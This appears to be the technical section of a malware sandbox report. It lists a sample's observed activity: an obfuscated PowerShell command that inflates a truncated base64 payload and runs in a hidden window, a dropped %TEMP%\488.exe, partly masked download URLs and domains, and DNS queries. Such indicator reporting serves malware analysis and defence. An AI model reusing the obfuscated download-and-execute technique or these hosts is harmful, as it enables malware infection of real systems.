Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $eNv:COMspec[4,26,25]-jOin'')( new-obJEcT syStEM.io.cOmPrEsSiOn.DEfLATESTrEAm([iO.mEMOrYStREAM][ConverT]::FROMBAsE64STRinG('VZDLbsIwFER/JYtIBlHsorKgRJHog1bd9IX6oOrGcS7kEscOzqUujfj3JlmgdjtzdK...
- %TEMP%\488.exe
- %TEMP%\488.exe
- 'hz##djd.com':80
- 'me######geriatrica.com.br':80
- 'me######geriatrica.com.br':443
- 'pk#.goog':80
- http://www.hz##djd.com/4wgp/
- http://www.me######geriatrica.com.br/9V8/
- http://pk#.goog/gsr1/gsr1.crt
- 'me######geriatrica.com.br':443
- DNS ASK hz##djd.com
- DNS ASK em###arton.com
- DNS ASK li####na.barcelona
- DNS ASK me######geriatrica.com.br
- DNS ASK pk#.goog
- DNS ASK ri#####amindonesia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $eNv:COMspec[4,26,25]-jOin'')( new-obJEcT syStEM.io.cOmPrEsSiOn.DEfLATESTrEAm([iO.mEMOrYStREAM][ConverT]::FROMBAsE64STRinG('VZDLbsIwFER/JYtIBlHsorKgRJHog1bd9IX6oOrGcS7kEscOzqUujfj3JlmgdjtzdK...' (with hidden window)